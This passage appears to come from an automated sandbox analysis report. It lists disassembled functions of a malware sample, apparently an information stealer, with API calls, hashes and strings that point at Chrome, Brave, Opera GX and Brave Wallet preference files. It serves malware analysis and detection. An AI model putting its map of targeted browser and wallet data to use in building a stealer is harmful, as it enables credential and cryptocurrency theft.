                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileOperation
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3080627654-0
                                                                                                                                                                                                                                                    • Opcode ID: e405215fcdf82b9c9b467f1f3e821b22018857a0f4bc32b18c08051e44594751
                                                                                                                                                                                                                                                    • Instruction ID: f607df7ca0eda1f018aa44e83ce0ca4578f6fb8c29478cbeb10c2e693445ed3f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e405215fcdf82b9c9b467f1f3e821b22018857a0f4bc32b18c08051e44594751
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8E092B0D0420E9FDB44EFA8D9452EEBAF8BF08308F00556AC119F3240E7B942058BA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                                                                                                    • Opcode ID: d62670074b24c6e6fe429ad53cee237eec7a6ba2b61b81dff990b1b57181c042
                                                                                                                                                                                                                                                    • Instruction ID: 8d80e0434eb309004071cb2c1214cec514e87d09ad5bec9dc204ed7fa48e81df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d62670074b24c6e6fe429ad53cee237eec7a6ba2b61b81dff990b1b57181c042
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F92103B4600B108FD720DF6ED085996B7F4FF49324B18886DE68A8B722D772E881CB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00094D1C
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00094D33
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00094D4F
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00094D60
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B69F8), ref: 00094D81
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B69FC), ref: 00094D9B
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00094DC2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B660F), ref: 00094DD6
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00094DFF
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00094E16
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00094E28
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00094E3D
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00094E82
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00094E94
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00094EA9
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00094EC2
                                                                                                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00094ED7
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,000B6A28,000B661D), ref: 00094F90
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00094FA0
                                                                                                                                                                                                                                                      • Part of subcall function 00092166: CreateFileA.KERNEL32(00094FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00094FAC,?), ref: 00092181
                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00094FB6
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00094FC1
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00094FE7
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00095105
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00095125
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                    • API String ID: 956187361-332874205
                                                                                                                                                                                                                                                    • Opcode ID: 67f9fefba9c51d719cab5c753cabafc81def2d95ccb68653e46d051a0c7ec92c
                                                                                                                                                                                                                                                    • Instruction ID: 0d0bcc4030239634f957fd10976f59da1f7c0772df1d3093051df7e3997f425d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67f9fefba9c51d719cab5c753cabafc81def2d95ccb68653e46d051a0c7ec92c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56C108B2D0021AAFDF22AB64EC499EE77BCAF04304F0145A1FA09B7151DB35AF859F51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,000B67F2,000B67EF,000B7324,000B67EE,?,?,?), ref: 00089DC6
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7328), ref: 00089DE7
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B732C), ref: 00089E01
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,000B7330,?,000B67F3), ref: 00089E93
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Brave,000B7350,000B7354,000B7330,?,000B67F3), ref: 0008A015
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 0008A02F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008A0EF
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008A1BE
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0008A1FC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0008A266
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0008CCE9), ref: 0008A279
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0008A35C
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008A41C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0008A4C1
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008A522
                                                                                                                                                                                                                                                      • Part of subcall function 00088DDB: lstrlenA.KERNEL32(?), ref: 00088FD4
                                                                                                                                                                                                                                                      • Part of subcall function 00088DDB: lstrlenA.KERNEL32(?), ref: 00088FEF
                                                                                                                                                                                                                                                      • Part of subcall function 00089549: lstrlenA.KERNEL32(?), ref: 00089970
                                                                                                                                                                                                                                                      • Part of subcall function 00089549: lstrlenA.KERNEL32(?), ref: 0008998B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0008A553
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008A613
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008A6AA
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0008A76E
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0008A782
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                                                                    • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                                    • API String ID: 4173076446-1189830961
                                                                                                                                                                                                                                                    • Opcode ID: a842381c68adc029672e52ef683a4d82f9e938823cd58f6a9244107f381a1264
                                                                                                                                                                                                                                                    • Instruction ID: 00642009eab66e2fce7fb0911208aa6d42b6cd49d9d14a6c8e1be199929617ec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a842381c68adc029672e52ef683a4d82f9e938823cd58f6a9244107f381a1264
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 084204329401299FDF61BB64EC4ABDD77B5BF04304F4501E1F988A7122EB31AE999F81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                    • API String ID: 2178766154-445461498
                                                                                                                                                                                                                                                    • Opcode ID: ac25859db5a8a8d15da0558459df3f72d60200a4319236d4f76c3f369b3743b3
                                                                                                                                                                                                                                                    • Instruction ID: 91b50cbb88474c15386d2ba584d57f2aa633db772032c4c5596c3036b98e249f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac25859db5a8a8d15da0558459df3f72d60200a4319236d4f76c3f369b3743b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95812571D0022DABCF60AB60EC49ACD77B8FF04304F4584E6E588A7151EF35AE898F91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00095B30
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00095B37
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00095B50
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00095B67
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6A98), ref: 00095B88
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6A9C), ref: 00095BA2
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00095C86
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: _memset.LIBCMT ref: 00095845
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: _memset.LIBCMT ref: 00095856
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00095881
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0009589F
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000958B3
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000958C6
                                                                                                                                                                                                                                                      • Part of subcall function 0009580D: StrStrA.SHLWAPI(00000000), ref: 0009596A
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00095CA9
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00095BC9
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00095CD8
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00095CEC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095D1A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095D2D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00095D39
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00095D56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
